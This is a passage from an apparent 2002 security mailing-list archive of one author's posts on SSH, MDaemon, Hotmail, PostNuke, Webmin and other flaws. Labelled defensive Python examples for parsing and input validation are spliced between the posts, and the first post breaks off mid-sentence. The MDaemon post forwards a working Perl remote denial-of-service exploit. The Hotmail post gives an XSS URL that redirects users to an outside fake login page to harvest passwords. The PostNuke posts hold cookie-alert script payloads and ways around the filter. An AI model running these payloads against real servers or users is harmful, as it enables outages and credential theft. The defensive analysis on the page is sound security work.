   Limit  access  to  SSH  servers  to  trusted  hosts and networks using
   firewalls or other packet-filtering systems. Some SSH servers may have
   the  ability  to  restrict  access  based  on IP addresses, or similar
   effects  may  be  achieved  by  using  TCP  wrappers  or other related
   technology.

   SSH  clients  can  reduce  the  risk  of attacks by only connecting to
   trusted servers by IP address.

   While  these  workarounds  will  not  prevent  exploitation  of  these
   vulnerabilities,  they  will  make attacks somewhat more difficult, in
   part by limiting the number of potential sources of attacks.


Appendix A. Vendor Information

   This  appendix  contains information provided by vendors. When vendors
   report  new  information,  this section is 
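The four CVE classes listed in the advisory (incorrect field lengths, empty list elements, classic overflows, NUL characters in strings) map directly onto the checks a transport-layer parser must make before it trusts a length field or copies a string. The block below is an added example, not code from the CERT advisory, from Rapid7's SSHredder or from any SSH implementation: a strict Python parser for the unencrypted SSH binary packet and the KEXINIT message, run against a well-formed packet and SSHredder-style mutations of it, all constructed inline. The function names, the 35000-byte cap (the minimum total packet size RFC 4253 requires receivers to accept, used here as a hard limit) and the sample algorithm names are assumptions of the example.

```python
# Added example: strict parsing of the SSH binary packet and KEXINIT name-lists.
# Packet layout (RFC 4253 s.6, the published form of the draft quoted above):
#   uint32 packet_length | byte padding_length | payload | padding | [MAC]
import struct

MAX_PACKET = 35000      # RFC 4253 s.6.1 minimum a receiver must accept; hard cap here (assumption)
BLOCK = 8               # block size in effect before NEWKEYS (cipher "none" uses 8)
SSH_MSG_KEXINIT = 20

class SSHParseError(ValueError):
    """Raised for any packet the strict parser refuses."""

def parse_packet(buf: bytes) -> bytes:
    """Return the payload of one unencrypted SSH packet or raise SSHParseError.

    Every length is checked against the bytes actually present before use.
    """
    if len(buf) < 5:
        raise SSHParseError("truncated packet header")
    (packet_length,) = struct.unpack(">I", buf[:4])
    padding_length = buf[4]
    if not 5 <= packet_length <= MAX_PACKET:                 # CAN-2002-1357 class
        raise SSHParseError(f"packet_length {packet_length} out of range")
    if (4 + packet_length) % BLOCK:
        raise SSHParseError("packet size is not a multiple of the block size")
    if len(buf) < 4 + packet_length:
        raise SSHParseError("declared packet_length exceeds bytes received")
    if padding_length < 4 or padding_length >= packet_length:
        raise SSHParseError(f"padding_length {padding_length} invalid")
    payload_len = packet_length - padding_length - 1
    if payload_len < 1:
        raise SSHParseError("empty payload")
    return buf[5:5 + payload_len]

def read_string(payload: bytes, off: int) -> tuple[bytes, int]:
    """SSH 'string' (uint32 length + bytes); the length is bounded by what is left."""
    if off + 4 > len(payload):
        raise SSHParseError("truncated string length")
    (n,) = struct.unpack(">I", payload[off:off + 4])
    off += 4
    if n > len(payload) - off:                               # CAN-2002-1359 class: no blind copy
        raise SSHParseError(f"string length {n} exceeds remaining {len(payload) - off} bytes")
    return payload[off:off + n], off + n

def parse_name_list(raw: bytes) -> list[str]:
    """RFC 4251 name-list: comma-separated, non-empty, printable US-ASCII names."""
    if raw == b"":
        return []
    if b"\x00" in raw:                                       # CAN-2002-1360 class
        raise SSHParseError("NUL byte in name-list")
    names = raw.split(b",")
    for name in names:
        if name == b"":                                      # CAN-2002-1358 class: ",," or edge comma
            raise SSHParseError("empty element in name-list")
        if any(c < 0x21 or c > 0x7e for c in name):
            raise SSHParseError(f"illegal byte in name {name!r}")
    return [n.decode("ascii") for n in names]

KEXINIT_FIELDS = ("kex", "host_key", "enc_c2s", "enc_s2c", "mac_c2s", "mac_s2c",
                  "comp_c2s", "comp_s2c", "lang_c2s", "lang_s2c")

def parse_kexinit(payload: bytes) -> dict:
    """SSH_MSG_KEXINIT: byte 20 | 16-byte cookie | 10 name-lists | bool | uint32 0."""
    if not payload or payload[0] != SSH_MSG_KEXINIT:
        raise SSHParseError("not a KEXINIT message")
    if len(payload) < 17:
        raise SSHParseError("truncated cookie")
    off, out = 17, {}
    for field in KEXINIT_FIELDS:
        raw, off = read_string(payload, off)
        out[field] = parse_name_list(raw)
    if off + 5 != len(payload):                              # first_kex_packet_follows + reserved
        raise SSHParseError("KEXINIT tail truncated or trailing bytes present")
    out["first_kex_packet_follows"] = payload[off] != 0
    return out

def build_kexinit(lists: list[bytes]) -> bytes:
    """Assemble an unencrypted KEXINIT packet; used only to construct sample input."""
    payload = bytes([SSH_MSG_KEXINIT]) + b"\x00" * 16
    for item in lists:
        payload += struct.pack(">I", len(item)) + item
    payload += b"\x00" + struct.pack(">I", 0)
    padding = BLOCK - (5 + len(payload)) % BLOCK
    if padding < 4:
        padding += BLOCK
    return (struct.pack(">I", 1 + len(payload) + padding) + bytes([padding])
            + payload + b"\x00" * padding)

def check_packet(packet: bytes) -> str:
    """Run a packet through both parsers: 'ok' or 'rejected: <reason>'."""
    try:
        parse_kexinit(parse_packet(packet))
        return "ok"
    except SSHParseError as err:
        return f"rejected: {err}"

# Constructed samples: one well-formed KEXINIT and SSHredder-style mutations of it.
GOOD_LISTS = [b"diffie-hellman-group1-sha1", b"ssh-rsa,ssh-dss", b"aes128-cbc,3des-cbc",
              b"aes128-cbc,3des-cbc", b"hmac-sha1", b"hmac-sha1", b"none", b"none", b"", b""]
GOOD = build_kexinit(GOOD_LISTS)
SAMPLES = {
    "good":               GOOD,
    "huge_packet_length": b"\xff\xff\xff\xff" + GOOD[4:],                 # CAN-2002-1357
    "huge_string_length": GOOD[:22] + b"\xff\xff\xff\xff" + GOOD[26:],    # length of first name-list
    "empty_list_element": build_kexinit([GOOD_LISTS[0], b"ssh-rsa,,ssh-dss"] + GOOD_LISTS[2:]),
    "nul_in_name":        build_kexinit([b"diffie-hellman\x00-group1-sha1"] + GOOD_LISTS[1:]),
    "bad_padding":        GOOD[:4] + b"\x01" + GOOD[5:],                   # padding_length below 4
}

if __name__ == "__main__":
    for name, pkt in SAMPLES.items():
        print(f"{name:20s} {check_packet(pkt)}")
```

The parser rejects a packet as soon as a declared length disagrees with the bytes on hand, which is the difference between returning a protocol error and indexing past a buffer in the pre-authentication code path the advisory describes.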

CERT Advisory CA-2002-35 Vulnerability in RaQ 4 Servers (fwd)

2002-12-12 Thread Muhammad Faisal Rauf Danka
 for more 
   information. 


Getting security information 


   CERT publications and other security information are available from 
   our web site 
   http://www.cert.org/ 


   To subscribe to the CERT mailing list for advisories and bulletins, 
   send email to [EMAIL PROTECTED] Please include in the body of your 
   message 


   subscribe cert-advisory 


   * CERT and CERT Coordination Center are registered in the U.S. 
   Patent and Trademark Office. 


   NO WARRANTY 
   Any material furnished by Carnegie Mellon University and the Software 
   Engineering Institute is furnished on an as is basis. Carnegie 
   Mellon University makes no warranties of any kind, either expressed or 
   implied as to any matter including, but not limited to, warranty of 
   fitness for a particular purpose or merchantability, exclusivity or 
   results obtained from use of the material. Carnegie Mellon University 
   does not make any warranty of any kind with respect to freedom from 
   patent, trademark, or copyright infringement. 


   Conditions for use, disclaimers, and sponsorship information 


   Copyright 2002 Carnegie Mellon University. 


   Revision History 
December 11, 2002: Initial release 


-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8 


iQCVAwUBPfe3rGjtSoHZUTs5AQGi9gP/YKUB3k9mabWL7w3OYun7zPpsYqtRRFgE 
zpG77X/wKuHoUjxMArn0thzBeGmpmM0WJ7o3boggArwmgLgm6XQTJyg76JDHKEU5 
/ozCZnhd4C39veE08rL1qQgXYIlo56QIANDdCnBchl6Fe/41XYjKblIhlxItRfbM 
2bpmCCLvQzk= 
=5ayh 
-----END PGP SIGNATURE-----




Regards

Muhammad Faisal Rauf Danka






Re: MDaemon SMTP/POP/IMAP server DoS

2002-10-29 Thread Muhammad Faisal Rauf Danka
There have been earlier issues with UIDL and DoS conditions in MDaemon 2.8.5.0 (to be
specific).
Check bid 1366, http://online.securityfocus.com/bid/1366/

The website still offers the 6.0.7 (vulnerable) version for download,
so apparently no workaround exists except for shutting it down until
the patch or a newer version is available.


Regards

Muhammad Faisal Rauf Danka

Head of GemSEC / Chief Technology Officer
Gem Internet Services (Pvt) Ltd.
web: www.gem.net.pk
Key Id: 0x784B0202
Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 
784B 0202


--- D4rkGr3y [EMAIL PROTECTED] wrote:
##
#Product: MDaemon SMTP/POP/IMAP server   #
#Authors: Alt-N Technologies Ltd [www.mdaemon.com]   #
#Vulnerable versions: v.6.0.7 and below  #
#Vulnerability: buffer overflow  #
#Bugexploit by D4rkGr3y [www.dhgroup.org]   #
##

#Overview#--#
From MDaemon's help file:
MDaemon Server v6 brings SMTP/POP/IMAP and MIME mail services
commonplace on UNIX hosts and the Internet to Windows based servers
and microcomputers. MDaemon is designed to manage the email needs of
any number of individual users and comes complete with a powerful set
of integrated tools for managing mail accounts and message formats.
MDaemon offers a scalable SMTP, POP3, and IMAP4 mail server complete
with LDAP support, an integrated browser-based email client, content
filtering, spam blockers, extensive security features, and more.

#Problem##
Bug found in MDaemon's POP server. It's possible to kill MDaemon by
sending long arguments (32b and above) with DELE or UIDL commands.
To do this you must have at least a mail account on the vulnerable host.
After getting a long request from the client, all MDaemon's services will be
closed (smtp, imap, pop, (?)worldclient).
Here the log of attack on local MDaemon POP-server:

+OK dark.ru POP MDaemon ready using UNREGISTERED SOFTWARE 6.0.7 MDAEMON-F200210
[EMAIL PROTECTED]
USER D4rkGr3y
+OK D4rkGr3y... Recipient ok
PASS cool-pass
+OK [EMAIL PROTECTED]'s mailbox has 1 total messages (18356 octets).
UIDL 

Connection to host lost...

#Exploit##

#!/usr/bin/perl
# MDaemon SMTP/POP/IMAP server remote DoS exploit by D4rkGr3y
use strict;
use warnings;
use IO::Socket;

my $host  = "[vuln_host]";   # vulnerable MDaemon host
my $login = "[login]";       # a valid mailbox on that host is required
my $pass  = "[pass]";
my $port  = 110;             # POP3
my $data  = "1";
my $num   = 32;              # 32 bytes or more in the argument crashes the service
my $buf   = $data x $num;    # "111...1", 32 characters

my $socket = IO::Socket::INET->new(
    PeerAddr => $host,
    PeerPort => $port,
    Proto    => "tcp",
    Type     => SOCK_STREAM,
) or die "Couldn't connect: $!\n";

# POP3 is line oriented (CRLF); read each reply so commands are not sent early
my $banner = <$socket>;
print $socket "USER $login\r\n"; my $r1 = <$socket>;
print $socket "PASS $pass\r\n";  my $r2 = <$socket>;   # original sent the unset $user
print $socket "UIDL $buf\r\n";                           # overlong argument kills the server
close($socket);

#EOF

Best regards   www.dhgroup.org
  D4rkGr3yicq 540981

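The crash described in the post comes from a POP3 command argument longer than the server expected. The block below is an added example, not MDaemon's code and not part of D4rkGr3y's post: server-side validation of POP3 command lines before any argument is stored or acted on. The limits are from the standards (RFC 1939 s.3: keywords are three or four characters, each argument at most 40 characters; RFC 2449: a command line is at most 255 octets including CRLF), and on top of that DELE, UIDL, RETR and TOP take message numbers, so an argument is checked against the mailbox rather than only for length. The command table, the error strings and the session lines (including the 32-byte UIDL argument the exploit sends) are constructed for the example.

```python
# Added example: validate POP3 command lines before touching their arguments.
MAX_LINE = 255   # RFC 2449: servers must accept command lines up to 255 octets incl. CRLF
MAX_ARG = 40     # RFC 1939 s.3: each argument may be up to 40 characters

# keyword -> (min args, max args, argument kinds); the kinds drive the semantic check
COMMANDS = {
    b"USER": (1, 1, ("name",)),
    b"PASS": (1, 1, ("secret",)),
    b"STAT": (0, 0, ()),
    b"LIST": (0, 1, ("msgnum",)),
    b"RETR": (1, 1, ("msgnum",)),
    b"DELE": (1, 1, ("msgnum",)),
    b"NOOP": (0, 0, ()),
    b"RSET": (0, 0, ()),
    b"TOP":  (2, 2, ("msgnum", "count")),
    b"UIDL": (0, 1, ("msgnum",)),
    b"QUIT": (0, 0, ()),
}

class Pop3Error(ValueError):
    """Raised for any command line the server must answer with -ERR."""

def parse_command(line: bytes, mailbox_size: int) -> tuple[str, list]:
    """Validate one client line; return (KEYWORD, typed args) or raise Pop3Error.

    Nothing from the line is copied anywhere until its length, character set,
    argument count and argument meaning have all been checked.
    """
    if len(line) > MAX_LINE:
        raise Pop3Error(f"line too long ({len(line)} > {MAX_LINE})")
    if not line.endswith(b"\r\n"):
        raise Pop3Error("line not terminated by CRLF")
    body = line[:-2]
    if any(not 0x20 <= c <= 0x7e for c in body):            # also rejects NUL bytes
        raise Pop3Error("non-printable byte in command")
    keyword, _, rest = body.partition(b" ")
    keyword = keyword.upper()
    if keyword not in COMMANDS:
        raise Pop3Error("unknown command")
    lo, hi, kinds = COMMANDS[keyword]
    if keyword == b"PASS":                                    # RFC 1939: the password may contain spaces
        args = [rest] if rest else []
    else:
        args = rest.split(b" ") if rest else []
    if not lo <= len(args) <= hi:
        raise Pop3Error(f"{keyword.decode()} takes {lo}..{hi} argument(s), got {len(args)}")
    typed = []
    for kind, arg in zip(kinds, args):
        if not 1 <= len(arg) <= MAX_ARG:
            raise Pop3Error(f"argument length {len(arg)} outside 1..{MAX_ARG}")
        if kind in ("msgnum", "count"):
            if not arg.isdigit():
                raise Pop3Error(f"{keyword.decode()} argument must be a number")
            n = int(arg)
            # A 32-byte run of digits is well within 40 characters, but it is not a
            # message this mailbox has: the semantic check catches what a pure
            # length limit would let through.
            if kind == "msgnum" and not 1 <= n <= mailbox_size:
                raise Pop3Error("no such message")
            typed.append(n)
        elif kind == "name":
            typed.append(arg.decode("ascii"))
        else:
            typed.append("***")                               # never log or echo the secret
    return keyword.decode("ascii"), typed

def run_session(lines, mailbox_size: int) -> list[str]:
    """Answer each client line with +OK (echoing the parsed command) or -ERR <reason>."""
    replies = []
    for line in lines:
        try:
            keyword, args = parse_command(line, mailbox_size)
            replies.append("+OK " + " ".join([keyword] + [str(a) for a in args]))
        except Pop3Error as err:
            replies.append(f"-ERR {err}")
    return replies

# Constructed session: the login from the post, the 32-byte UIDL argument the
# exploit sends, a 64-byte DELE argument, and ordinary commands for comparison.
SESSION = [
    b"USER D4rkGr3y\r\n",
    b"PASS cool-pass\r\n",
    b"STAT\r\n",
    b"UIDL " + b"1" * 32 + b"\r\n",
    b"DELE " + b"A" * 64 + b"\r\n",
    b"RETR 1\r\n",
    b"TOP 1 0\r\n",
    b"QUIT\r\n",
]

if __name__ == "__main__":
    for line, reply in zip(SESSION, run_session(SESSION, mailbox_size=1)):
        print(f"C: {line[:-2].decode()!r:40s} S: {reply}")
```

With a one-message mailbox the 32-byte UIDL argument is refused as a non-existent message number and the 64-byte DELE argument as over-long; a server that copies the argument into a fixed buffer before either check has already lost, which is what the post's log shows.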



Re: XSS bug in hotmail login page

2002-10-08 Thread Muhammad Faisal Rauf Danka

A lot can happen for sure, but I tried one myself, to redirect the request to some
other web page.
One can make a fake Hotmail page asking for the password, storing it locally in a text file
and then again redirect to the original Hotmail page.
Using this method one could steal passwords of Hotmail/MSN users.
We have all seen previously people making Hotmail-looking pages, asking you to first
login through it, or asking you to send your login/pass along with the login name of
the person you want to get hacked (all nasty scams like that).
Now if it is not fixed they will have an easy way to trick them by asking them to
visit the "Hotmail new policy" at:

http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=&id=2&fs=1&cb=";<script>location.replace("http://www.ownhomepage.com/frames/hotmailfake.html");</script>&ct=1033054530&_setlang=

And then have a fake setup to trick them into entering their passwords at:
http://www.ownhomepage.com/frames/hotmailfake.html


Regards

Muhammad Faisal Rauf Danka

Head of GemSEC / Chief Technology Officer
Gem Internet Services (Pvt) Ltd.
web: www.gem.net.pk
Key Id: 0x784B0202
Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 
784B 0202




Re: Postnuke XSS fixed

2002-10-07 Thread Muhammad Faisal Rauf Danka

Now it is redirecting back to /index.php on all attempts mentioned
previously, no more HTTP VARIABLE error.

Regards

Muhammad Faisal Rauf Danka

Head of GemSEC / Chief Technology Officer
Gem Internet Services (Pvt) Ltd.
web: www.gem.net.pk
Key Id: 0x784B0202
Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 
784B 0202




Re: Postnuke XSS fixed

2002-10-03 Thread Muhammad Faisal Rauf Danka

I just checked it again:

http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=<script+alert(document.cookie);</script>

where + denotes a blank space, or similarly this one:

http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=<script%20alert(document.cookie);</script>

resulting in the "Sorry - $HTTP_GET_VARS contains javascript..." message.

However the request:
?op=modload&name=News&file=article&sid=\<script>alert(document.cookie);</script>

or any character inserted before the first script and after the first "less than"
results in a DB Error, revealing nothing (user/pass/path etc.).

But I used IE and Netscape, maybe it's different with other browsers. :)

Regards

Muhammad Faisal Rauf Danka

Head of GemSEC / Chief Technology Officer
Gem Internet Services (Pvt) Ltd.
web: www.gem.net.pk
Key Id: 0x784B0202
Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 
784B 0202


--- Daniel Woods [EMAIL PROTECTED] wrote:

Humm!

> on 26th Sep the following url:
> http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>
>
> used to give Alert PopUp and
> Error:
> DB Error: getArticles: 1064: You have an error in your SQL syntax near '='
> at line 23
>
> now it gives:
> Sorry - $HTTP_GET_VARS contains javascript...
>
> Prompt fix by PostNuke team, great work Keep it up! :)

Not so fast on the praise :(

It only took me a couple of workarounds to find ways to bypass the check.

  http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>

Using the request...

?op=modload&name=News&file=article&sid=\<script>alert(document.cookie);</script>
gives me the DB Error: message

And using the request...

?op=modload&name=News&file=article&sid=<script+alert(document.cookie);</script>
gives me the Alert Popup and DB Error: message...  the '+' is treated as a blank.

Thanks... Dan.

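Both the Hotmail login page discussed above and the PostNuke `sid` parameter in this thread reflect a request parameter into the page, and the PostNuke fix tried to spot `<script` in the input rather than fix the output. The block below is an added example, not PostNuke's, Hotmail's or any poster's code: it shows why a keyword blacklist is defeated by spelling variants (including the `+`-as-space request quoted above and, going beyond the thread's payloads, one with no script tag at all) while allowlisting the parameter and encoding the output for its context (HTML text, or a JavaScript string literal as on a login page) holds. The blacklist regex, the page templates, the `render_*` names and the Hotmail-style payload (rewritten to fit the assumed template, since the real page's markup is not on this page) are assumptions of the example.

```python
# Added example: keyword blacklist vs. allowlist + context-aware output encoding.
import html
import json
import re
from urllib.parse import unquote_plus

# Naive blacklist of the kind the thread's "contains javascript" check suggests:
# it recognises exactly one spelling of the tag (assumption; the real filter is
# not on the page).
BLACKLIST = re.compile(r"<script>", re.IGNORECASE)

def blacklist_allows(value: str) -> bool:
    """True when the naive filter would let the value through."""
    return BLACKLIST.search(value) is None

def query_param(query: str, name: str) -> str:
    """Decode one query-string value the way the server does ('+' and %XX decoded)."""
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if unquote_plus(key) == name:
            return unquote_plus(value)
    return ""

# --- PostNuke case: sid is echoed into an HTML error message (and used in SQL) ---
SID_RE = re.compile(r"^[1-9][0-9]{0,9}$")      # article ids are small positive integers

def render_error_vulnerable(sid: str) -> str:
    """Reflects the raw parameter into HTML, as the DB Error page in the thread did."""
    return f"<p>DB Error: getArticles: bad sid {sid}</p>"

def render_error_hardened(sid: str) -> str:
    """Allowlist the parameter first; escape anything that is echoed."""
    if not SID_RE.match(sid):
        return "<p>DB Error: invalid article id</p>"    # the rejected value is never echoed
    return f"<p>DB Error: getArticles: no article {html.escape(sid)}</p>"

def echoes_markup(page: str) -> bool:
    """True if the text inside the fixed <p>...</p> wrapper contains a tag delimiter."""
    inner = page[len("<p>"):-len("</p>")]
    return "<" in inner or ">" in inner

# --- Hotmail-style case: a parameter reflected inside a JavaScript string literal ---
def render_script_vulnerable(cb: str) -> str:
    return f'<script>var cb = "{cb}";</script>'

def render_script_hardened(cb: str) -> str:
    # json.dumps produces a valid JS string literal with quotes, backslashes and
    # control characters escaped; "</" is escaped as well so the value can never
    # terminate the enclosing <script> element.
    literal = json.dumps(cb).replace("</", "<\\/")
    return f"<script>var cb = {literal};</script>"

# Constructed inputs: the PostNuke requests quoted in the thread, one honest
# request, and one with no script tag at all.
POSTNUKE_QUERIES = {
    "plain":     "op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>",
    "backslash": "op=modload&name=News&file=article&sid=\\<script>alert(document.cookie);</script>",
    "plus":      "op=modload&name=News&file=article&sid=<script+alert(document.cookie);</script>",
    "no_tag":    "op=modload&name=News&file=article&sid=<img src=x onerror=alert(document.cookie)>",
    "honest":    "op=modload&name=News&file=article&sid=42",
}
# Payload for the assumed script template (the thread's Hotmail payload targets
# markup that is not shown on the page, so it is rewritten for this template).
HOTMAIL_CB = '";location.replace("http://www.ownhomepage.com/frames/hotmailfake.html");//'

def evaluate(query: str) -> dict:
    """Compare the blacklist, the vulnerable page and the hardened page on one request."""
    sid = query_param(query, "sid")
    return {
        "sid": sid,
        "blacklist_allows": blacklist_allows(sid),
        "vulnerable_echoes_markup": echoes_markup(render_error_vulnerable(sid)),
        "hardened_echoes_markup": echoes_markup(render_error_hardened(sid)),
    }

if __name__ == "__main__":
    for name, query in POSTNUKE_QUERIES.items():
        print(name, evaluate(query))
    print(render_script_vulnerable(HOTMAIL_CB))
    print(render_script_hardened(HOTMAIL_CB))
```

Which of the thread's variants slips past a given blacklist depends entirely on the pattern the blacklist uses, which is the point: the `sid` allowlist rejects every one of them without knowing what a script tag looks like, and it also removes the SQL syntax error that the DB Error message reveals.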



Postnuke XSS fixed

2002-10-02 Thread Muhammad Faisal Rauf Danka

on 26th Sep the following url:
http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>

used to give Alert PopUp and 
Error:
DB Error: getArticles: 1064: You have an error in your SQL syntax near '='
at line 23

now it gives:
Sorry - $HTTP_GET_VARS contains javascript...

Prompt fix by PostNuke team, great work Keep it up! :)


Regards

Muhammad Faisal Rauf Danka

Head of GemSEC / Chief Technology Officer
Gem Internet Services (Pvt) Ltd.
web: www.gem.net.pk
Key Id: 0x784B0202
Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 
784B 0202




Re: Yet another XSS vulnerability in PHP NUKE

2002-09-28 Thread Muhammad Faisal Rauf Danka

This XSS issue with the search field has already been discovered and published by Mark 
Grimes.

see the link:
http://www.der-keiler.de/Mailing-Lists/securityfocus/bugtraq/2002-09/0289.html

Regards

Muhammad Faisal Rauf Danka

Head of GemSEC / Chief Technology Officer
Gem Internet Services (Pvt) Ltd.
web: www.gem.net.pk
Key Id: 0x784B0202
Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7  6A20 C592 484B 
784B 0202




Re: Webmin Vulnerability Leads to Remote Compromise (RPC CGI)

2002-08-30 Thread Muhammad Faisal Rauf Danka

The problem has been fixed several versions ago.
The current version is 0.990.
However I am using version 0.980 of Webmin,
and the default installation value for rpc in the defaultacl file is 2.

[root@linux /]# grep rpc /home/admin/webmin-0.980/defaultacl 
rpc=2
[root@linux /]# 

Regards

Muhammad Faisal Rauf Danka

Head of GemSEC / Chief Technology Officer
Gem Internet Services (Pvt) Ltd.
web: www.gem.net.pk
Key Id: 0x784B0202
Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7  6A20 C592 484B 
784B 0202




Re: Xitami Connection Flood Server Termination Vulnerability

2002-08-02 Thread Muhammad Faisal Rauf Danka

I tried the same method as you suggested on Xitami 2.5b5 for Win32,
but my results are a bit different.

I received the following errors:

Service Unavailable error
It ignores session requests

Although I tried it using a Perl script flooding GET requests in a
loop, instead of using the browser quickie, but yeah, I had the maximum
number of concurrent sessions value set quite low, as it was 100 only.

But if the bug is in the method of identifying the max sessions and
responding to it, then it should work even if it's set to 5.

So is it specific to some limit like more than $value number of
sessions, or could it be your hardware resources running out during your
tests?

Regards, 
-
Muhammad Faisal Rauf Danka

Chief Technology Officer
Gem Internet Services (Pvt) Ltd.
web: www.gem.net.pk




Re: Hosting Controller Vulnerability

2002-07-14 Thread Muhammad Faisal Rauf Danka

Instead of using something like the @stake web proxy, could you also save the HTML output
of (/accounts/updateuserdesc.asp) locally, change the username to administrator and
re-submit the form? And how are they validating the user name after applying the patch?

Regards, 
-
Muhammad Faisal Rauf Danka

Chief Technology Officer
Gem Internet Services (Pvt) Ltd.
web: www.gem.net.pk
